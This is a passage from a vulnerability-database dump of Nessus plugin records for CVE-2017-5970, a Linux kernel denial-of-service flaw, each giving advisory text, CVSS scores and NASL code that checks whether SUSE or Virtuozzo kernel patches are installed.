ipv4_pktinfo_prepare function in\n net/ipv4/ip_sockglue.c in the Linux kernel allowed\n attackers to cause a denial of service (system crash)\n via (1) an application that made crafted system calls or\n possibly (2) IPv4 traffic with invalid IP options\n (bsc#1025013).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 26, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2017-03-21T00:00:00", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2017:0772-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-5970"], "modified": "2017-03-21T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_60-52_60-xen", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_60-52_60-default"], "id": "SUSE_SU-2017-0772-1.NASL", "href": "https://www.tenable.com/plugins/nessus/97850", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:0772-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(97850);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-5970\");\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2017:0772-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for the Linux Kernel 3.12.60-52_60 fixes one issue. The\nfollowing security bug was fixed :\n\n - CVE-2017-5970: The ipv4_pktinfo_prepare function in\n net/ipv4/ip_sockglue.c in the Linux kernel allowed\n attackers to cause a denial of service (system crash)\n via (1) an application that made crafted system calls or\n possibly (2) IPv4 traffic with invalid IP options\n (bsc#1025013).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1025013\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-5970/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20170772-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1600cd4a\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for SAP 12:zypper in -t patch\nSUSE-SLE-SAP-12-2017-423=1\n\nSUSE Linux Enterprise Server 12-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-2017-423=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_60-52_60-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_60-52_60-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/02/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_60-52_60-default-3-2.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_60-52_60-xen-3-2.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-06T09:13:12", "description": "According to the version of the vzkernel package and the\nreadykernel-patch installed, the Virtuozzo installation on the remote\nhost is affected by the following vulnerabilities :\n\n - A vulnerability was found in the Linux kernel where\n having malicious IP options present would cause the\n ipv4_pktinfo_prepare() function to drop/free the dst.\n This could result in a system crash or possible\n privilege escalation.\n\n - A vulnerability was found in the implementation of SCTP\n protocol in the Linux kernel. If the sctp module was\n loaded on the host, a privileged user inside a\n container could cause a kernel crash by triggering\n use-after-free in the __sctp_connect() function with a\n specially crafted sequence of system calls.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Virtuozzo security advisory.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 34, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2017-05-01T00:00:00", "title": "Virtuozzo 7 : readykernel-patch (VZA-2017-032)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-5970"], "modified": "2017-05-01T00:00:00", "cpe": ["cpe:/o:virtuozzo:virtuozzo:7", "p-cpe:/a:virtuozzo:virtuozzo:readykernel"], "id": "VIRTUOZZO_VZA-2017-032.NASL", "href": "https://www.tenable.com/plugins/nessus/99732", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(99732);\n script_version(\"3.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\n \"CVE-2017-5970\"\n );\n\n script_name(english:\"Virtuozzo 7 : readykernel-patch (VZA-2017-032)\");\n script_summary(english:\"Checks the readykernel output for the updated patch.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Virtuozzo host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the vzkernel package and the\nreadykernel-patch installed, the Virtuozzo installation on the remote\nhost is affected by the following vulnerabilities :\n\n - A vulnerability was found in the Linux kernel where\n having malicious IP options present would cause the\n ipv4_pktinfo_prepare() function to drop/free the dst.\n This could result in a system crash or possible\n privilege escalation.\n\n - A vulnerability was found in the implementation of SCTP\n protocol in the Linux kernel. If the sctp module was\n loaded on the host, a privileged user inside a\n container could cause a kernel crash by triggering\n use-after-free in the __sctp_connect() function with a\n specially crafted sequence of system calls.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Virtuozzo security advisory.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://help.virtuozzo.com/customer/portal/articles/2796925\");\n # https://readykernel.com/patch/Virtuozzo-7/readykernel-patch-15.2-20.0-1.vl7/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f67e555b\");\n # https://readykernel.com/patch/Virtuozzo-7/readykernel-patch-18.7-20.0-1.vl7/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e35a0d51\");\n # https://readykernel.com/patch/Virtuozzo-7/readykernel-patch-20.18-20.0-1.vl7/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e718308f\");\n script_set_attribute(attribute:\"solution\", value:\"Update the readykernel patch.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/04/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:readykernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:virtuozzo:virtuozzo:7\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Virtuozzo Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Virtuozzo/release\", \"Host/Virtuozzo/rpm-list\", \"Host/readykernel-info\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"readykernel.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/Virtuozzo/release\");\nif (isnull(release) || \"Virtuozzo\" >!< release) audit(AUDIT_OS_NOT, \"Virtuozzo\");\nos_ver = pregmatch(pattern: \"Virtuozzo Linux release ([0-9]+\\.[0-9])(\\D|$)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Virtuozzo 7.x\", \"Virtuozzo \" + os_ver);\n\nif (!get_kb_item(\"Host/Virtuozzo/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Virtuozzo\", cpu);\n\nrk_info = get_kb_item(\"Host/readykernel-info\");\nif (empty_or_null(rk_info)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\n\nchecks = make_list2(\n make_array(\n \"kernel\",\"vzkernel-3.10.0-327.18.2.vz7.15.2\",\n \"patch\",\"readykernel-patch-15.2-20.0-1.vl7\"\n ),\n make_array(\n \"kernel\",\"vzkernel-3.10.0-327.36.1.vz7.18.7\",\n \"patch\",\"readykernel-patch-18.7-20.0-1.vl7\"\n ),\n make_array(\n \"kernel\",\"vzkernel-3.10.0-327.36.1.vz7.20.18\",\n \"patch\",\"readykernel-patch-20.18-20.0-1.vl7\"\n )\n);\nreadykernel_execute_checks(checks:checks, severity:SECURITY_WARNING, release:\"Virtuozzo-7\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-07T14:25:35", "description": "This update for the Linux Kernel 3.12.55-52_42 fixes one issue. The\nfollowing security bug was fixed :\n\n - CVE-2017-5970: The ipv4_pktinfo_prepare function in\n net/ipv4/ip_sockglue.c in the Linux kernel allowed\n attackers to cause a denial of service (system crash)\n via (1) an application that made crafted system calls or\n possibly (2) IPv4 traffic with invalid IP options\n (bsc#1025013).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 26, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2017-03-21T00:00:00", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2017:0771-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-5970"], "modified": "2017-03-21T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_55-52_42-xen", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_55-52_42-default"], "id": "SUSE_SU-2017-0771-1.NASL", "href": "https://www.tenable.com/plugins/nessus/97849", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:0771-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(97849);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-5970\");\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2017:0771-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for the Linux Kernel 3.12.55-52_42 fixes one issue. The\nfollowing security bug was fixed :\n\n - CVE-2017-5970: The ipv4_pktinfo_prepare function in\n net/ipv4/ip_sockglue.c in the Linux kernel allowed\n attackers to cause a denial of service (system crash)\n via (1) an application that made crafted system calls or\n possibly (2) IPv4 traffic with invalid IP options\n (bsc#1025013).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1025013\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-5970/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20170771-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2d3acc9b\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for SAP 12:zypper in -t patch\nSUSE-SLE-SAP-12-2017-418=1\n\nSUSE Linux Enterprise Server 12-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-2017-418=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_55-52_42-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_55-52_42-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/02/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_55-52_42-default-7-2.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_55-52_42-xen-7-2.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-07T14:25:35", "description": "This update for the Linux Kernel 3.12.60-52_49 fixes one issue. The\nfollowing security bug was fixed :\n\n - CVE-2017-5970: The ipv4_pktinfo_prepare function in\n net/ipv4/ip_sockglue.c in the Linux kernel allowed\n attackers to cause a denial of service (system crash)\n via (1) an application that made crafted system calls or\n possibly (2) IPv4 traffic with invalid IP options\n (bsc#1025013).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 26, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2017-03-21T00:00:00", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2017:0769-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-5970"], "modified": "2017-03-21T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_60-52_49-xen", "cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_60-52_49-default"], "id": "SUSE_SU-2017-0769-1.NASL", "href": "https://www.tenable.com/plugins/nessus/97847", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:0769-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(97847);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-5970\");\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2017:0769-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for the Linux Kernel 3.12.60-52_49 fixes one issue. The\nfollowing security bug was fixed :\n\n - CVE-2017-5970: The ipv4_pktinfo_prepare function in\n net/ipv4/ip_sockglue.c in the Linux kernel allowed\n attackers to cause a denial of service (system crash)\n via (1) an application that made crafted system calls or\n possibly (2) IPv4 traffic with invalid IP options\n (bsc#1025013).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1025013\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-5970/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20170769-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a48b5e1f\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for SAP 12:zypper in -t patch\nSUSE-SLE-SAP-12-2017-420=1\n\nSUSE Linux Enterprise Server 12-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-2017-420=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_60-52_49-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_60-52_49-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/02/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_60-52_49-default-7-2.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_60-52_49-xen-7-2.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-07T14:25:35", "description": "This update for the Linux Kernel 3.12.60-52_57 fixes one issue. The\nfollowing security bug was fixed :\n\n - CVE-2017-5970: The ipv4_pktinfo_prepare function in\n net/ipv4/ip_sockglue.c in the Linux kernel allowed\n attackers to cause a denial of service (system crash)\n via (1) an application that made crafted system calls or\n possibly (2) IPv4 traffic with invalid IP options\n (bsc#1025013).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 26, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2017-03-21T00:00:00", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2017:0770-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-5970"], "modified": "2017-03-21T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_60-52_57-default", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_60-52_57-xen"], "id": "SUSE_SU-2017-0770-1.NASL", "href": "https://www.tenable.com/plugins/nessus/97848", "sourceData": 